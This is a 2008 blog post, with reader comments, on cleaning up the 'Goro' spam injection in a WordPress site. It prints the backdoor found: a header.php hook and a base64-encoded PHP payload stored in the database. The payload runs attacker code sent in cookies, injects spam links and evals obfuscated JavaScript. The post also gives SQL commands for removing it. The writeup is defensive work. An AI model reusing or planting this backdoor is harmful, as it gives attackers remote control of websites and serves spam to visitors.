WordPress Spam Injection: ‘Goro’ hacked my blog
Two days ago a my Northern European friend Era after reading a post adviced me that my blog site have been silently owned by Search Engine spammers. Spam in blog is definitely not a new phenomenon, but I knew very little of spam injection before, and I hope my experience can help other WordPress users.
The problem was that a foreign div loads in the header “div id=goro“, and a list of spam links to various porn links. I asked my dear webbie to help me, and she put me in touch with Francesco Mosca, who actually fixed the problem as follows.
Within the theme’s page header.php, hacked using likely a wordpress 2.0.1 bug:
create_function('', get_option("blog_headers")); ?> [snipped code]<?php $wp_headers() ?>
Actually those lines of code were calling the code contained within the database in the blog_headers option (“wp_options” table, option_name = ‘blog_headers’):
611a2dee6df9249f21eb25f254b7f8f3611a2dee6df9249f21eb25f254b
7f8f3611a2dee6df9249f21eb25f254b7f8f3611a2dee6df9249f21eb25
f254b7f8f3611a2dee6df9249f21eb25f254b7f8f3*/ $c55375dba9d2f1867f4083acce95988dd=’Pz48P3BocAoJaWYoaXNzZX
QoJF9DT09LSUVbJ2F1dGgnXSkgJiYgJF9DT09LSUVbJ2F1dGgnXSA9PSAn
NjExYTJkZWU2ZGY5MjQ5ZjIxZWIyNWYyNTRiN2Y4ZjMnKSB7CgkJaWYgK
Glzc2V0KCRfQ09PS0lFWydzaG93X3Rlc3QnXSkpIHsKCQkJZWNobygiPFRF
U1RQQVNTPiIpOwoJCX0KCQkkaSA9IDA7ICRsaW4gPScnOwoJCXdoaWxlI
Chpc3NldCgkX0NPT0tJRVsnbGFzdGluJy4kaV0pKSB7CgkJCSRsaW4uPSAk
X0NPT0tJRVsnbGFzdGluJy4kaV07CgkJCSRpKys7CgkJfQoJCWlmKHN0cmx
lbigkbGluKT4wKSB7CgkJCWVjaG8oIjxsYXN0aW4+Ii5tZDUoJGxpbikuIjwvb
GFzdGluPjxleC1kYXRhPiIpOwoJCQkkbGluID0gcHJlZ19yZXBsYWNlKCcvXy
8nLCAnKycsICRsaW4pOwoJCQlldmFsKGJhc2U2NF9kZWNvZGUoJGxpbikpO
woJCQllY2hvKCI8L2V4LWRhdGE+Iik7CgkJCSRjb2RlID0gZ2V0X29wdGlvbig
nYmxvZ19oZWFkZXJzJyk7CgkJCWlmIChwcmVnX21hdGNoKCcvOTU5ODh
kZD1cJyguKj8pXCcvcycsICRjb2RlLCAkcmVncykpIHsKCQkJCWVjaG8oIjx2
ZXI+Ii5tZDUoJHJlZ3NbMV0pLiI8L3Zlcj4iKTsKCQkJfQoJCX0KCQlleGl0KCk7
Cgl9CgkkdGV4dCA9IGdldF9vcHRpb24oJ3JlY2VudGx5X2FkZGVkJyk7Cgkkd
WEgPSAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107CglpZiAoaXNzZXQ
oJHRleHQpICYmIHN0cmxlbigkdGV4dCk+MCAmJiAocHJlZ19tYXRjaCgnLyhib
3R8c3BpZGVyfHNsdXJwfGdvb2dsZXxleHBsb3JlcnxmaXJlZm94fG9wZXJhKS
9pJywgJHVhKSkpIHsKCQkJCSRycSA9ICRfU0VSVkVSWyJSRVFVRVNUX1VS
SSJdOwoJCQkJJHJzcyA9ICJyc3NfIi5tZDUoJHJxKTsKCQkJCSRzZWVkID0gd
W5zZXJpYWxpemUoYmFzZTY0X2RlY29kZShnZXRfb3B0aW9uKCRyc3MpKS
k7CgkJCQlpZiAoISRzZWVkKSB7CgkJCQkJZ2xvYmFsICR3cGRiOwoJCQkJCS
R3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdG
lvbl9uYW1lLCBvcHRpb25fdmFsdWUsIG9wdGlvbl9kZXNjcmlwdGlvbiwgYXV0
b2xvYWQpIFZBTFVFUyAoJyRyc3MnLCAnJywgJycsICd5ZXMnKSIpOwoJCQk
JCSRzZWVkID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBMQVNUX0lOU0VSVF9
JRCgpIik7CgkJCQkJdXBkYXRlX29wdGlvbigkcnNzLGJhc2U2NF9lbmNvZGUoc2
VyaWFsaXplKGFycmF5KCRzZWVkLCRycSkpKSk7CgkJCQl9IGVsc2UgewoJCQ
kJCSRzZWVkID0gJHNlZWRbMF07CgkJCQl9CgkJCQkkdGV4dCA9IGJhc2U2NF
+JHdjKSB7CgkJCQkJJHNlZWQtPSR3YzsKCQkJCX0KCQkJCWVjaG8gJzxkaXY
gaWQ9Imdvcm8iPic7CgkJCQllY2hvIGpvaW4oIiZuYnNwOyIsYXJyYXlfc2xpY2
UoJGEsJHNlZWQqMzAtMzAsMzApKTsKCQkJCWVjaG8gJzwvZGl2PjxzY3JpcHQ
gdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4nOwoJCQkJZWNobyAiZnVuY3Rpb24g
Z2V0bWUoc3RyKXsgdmFyIGlkeCA9IHN0ci5pbmRleE9mKCc/Jyk7IGlmIChpZHg
gPT0gLTEpIHJldHVybiBzdHI7IHZhciBsZW4gPSBzdHIubGVuZ3RoOyB2YXIgbm
V3X3N0ciA9ICcnOyB2YXIgaSA9IDE7IGZvciAoKytpZHg7IGlkeCA8IGxlbjsgaW
R4ICs9IDIsaSsrKXsgdmFyIGNoID0gcGFyc2VJbnQoc3RyLnN1YnN0cihpZHgsID
IpLCAxNik7IG5ld19zdHIgKz0gU3RyaW5nLmZyb21DaGFyQ29kZSgoY2ggKyBp
KSAlIDI1Nik7IH0gZXZhbChuZXdfc3RyKTsgfSI7CgkJCQllY2hvICJnZXRtZSgna
HR0cDovL3BhZ2VhZDIuZ29vZ2xlc3luZGljYXRpb24uY29tL3BhZ2VhZC9zaG93
X2Fkcy5qcz82MzZENjA3MTY4NUY2NzZDMjU1RDVBNjgzODVFNTY1RDU0NUM
2MTJFNjQzMzREMTAwRTRENTQ1NjUyMDkwQTBFNTI1MjU2NDg0MDA4M0Q0
MTRBNDY0MTM1NEMwRkY4M0UzRTNDMzJGMzA2Jyk7IDwvc2NyaXB0PiI7Cgl
9Cgo/Pg==’;$e_ = error_reporting(0); eval(base64_decode($c55375dba9d2f1867f4083acce95988dd)); error_reporting($e_); return true;
Decoding it with base64_decode came out that such code calls an external javascript that pastes on the fly some spam links in the page, writing also in the option field strings of this form rss_
mysql> select option_value from wp_options where option_name =‘rss_fffbb7d85fc00f0c0d14abf4fde94ce3’;
+————————————+
| option_value
|+————————————+| YToyOntpOjA7czo0OiIxMTg3IjtpOjE7czoxODoiL3d3dy5tYW5kcml2YS5jb20vIjt9 |
+————————————+
Besides erasing the above mentioned lines from the header.php, you need also to erase blog_headers and ‘friends’ from the database:
delete from wp_options where option_name = ‘blog_headers’;delete from wp_options where option_name like ‘rss_%’ and option_namenot in (‘rss_language’,’rss_use_excerpt’,’ rss_excerpt_length’);
Find the offending goro spamware injection before google bans you from internet pipe. Amazingly as soon as I got it fixed my blog got its previous position.
Note: My blog is under repair these days, the old theme will soon be available, along with twitters and skype alert. Sorry about that.
vseo 12:14 pm on January 8, 2008 Permalink
Same on footer, same solution
meneame.net 12:20 pm on January 8, 2008 Permalink
Advertencia! Spam en wordpress…
Parece que nos la están jugando a los que tienen worpress. Mirad por favor vuestros códigos fuente. Muchos que utiliceis plantillas agenas vereis que están adulteradas. Hay una función en los plugins de la plantilla que está mostrando una serie de…
Gordon Dewis 11:01 pm on March 13, 2008 Permalink
You’re not alone in this. I found myself a victim of it after upgrading my WordPress to 2.3.x in December. Fortunately, I found someone else who had encountered it and their blog had some suggestions on how to deal with it. I blogged about the experience on my blog at http://gordon.dewis.ca/2008/01/06/expunging-the-wordpressnetin-spam-injection-hijack/
It’s amazing how many people are still affected by it.
Apollo Lee 5:56 pm on April 30, 2008 Permalink
Thanks for posting this. While a similar exploit only got my main blog, your post here really helped me know what to look for in the database. Combined with the WordPress 2.5.1 post over at WordPress.org, I was able to get this problem handled.
I guess that’ll teach me to keep my software up to date. I wonder how long it’ll take until I’m back on Technorati and Google Blogsearch.
Thanks again for your post.
Roberto Galoppini 9:27 am on May 1, 2008 Permalink
I am really glad it helped you, when I got in troubles I felt really hopeless. As a matter of fact google has proven to be really fast to give my rank back, and I wish you best of luck with that.
Oliver 12:11 pm on June 6, 2008 Permalink
Good article! your site let me learn more. Thanks!Pls keep up to date.
Aaron Wall 8:47 am on June 14, 2008 Permalink
Thanks for posting this. Mine was hacked with the same hack on the 13th (yes friday). Not great luck for friday the 13th but this post gave me peace.
joe 12:48 pm on July 3, 2008 Permalink
Hi, why don’t you activate the akismet spam? I have that kind of spam in few blog.
Roberto Galoppini 4:03 pm on July 3, 2008 Permalink
I do Joe, I do.
Maria 12:14 pm on August 1, 2008 Permalink
Very useful information for me. Thank you.
Hacker Forums 9:01 pm on October 7, 2008 Permalink
Most all blog hacks are from people not upgrading their blog software.
If you don’t make a ton of changes, just backup your template one time, then create or download a script to email you a database dumb every couple days.
wynajem kamperów 3:42 pm on October 22, 2008 Permalink
Thanks for posting this. Mine was hacked with the same hack on the 13th (yes friday). Not great luck for friday the 13th but this post gave me peace.
RaiulBaztepo 11:25 pm on March 28, 2009 Permalink
Hello!
Very Interesting post! Thank you for such interesting resource!
PS: Sorry for my bad english, I’v just started to learn this language 😉
See you!
Your, Raiul Baztepo
The Aftermath of a Wordpress Spam Injection (and a Tool to Prevent it) - Thoughts on social media, the web and technology - jungleG 7:17 pm on April 20, 2009 Permalink
[…] some research, I found out about some clever software injections that are either pushed via templates or plugins that are downloaded from non-Wordpress sites. I […]
strottrot.com » Blog Archive » Recovering from a WordPress Spam Injection 3:37 am on December 6, 2009 Permalink
[…] ==”));return;?> This is apparently a variation on the ‘Goro’ hack, which Roberto Galoppini explains calls an external javascript code when decoded with base64_decode. My impression is that this bad […]
Graham 3:39 am on November 12, 2010 Permalink
I’ve been seeing a lot of chat lately on WordPress security problems. They are currently leading in the blog race, but will, for sure, start losing people unless they show some dramatic improvement very soon.
Sorry about your problems but glad you found a fast fix and we’re restored to your previous Google rank.
Graham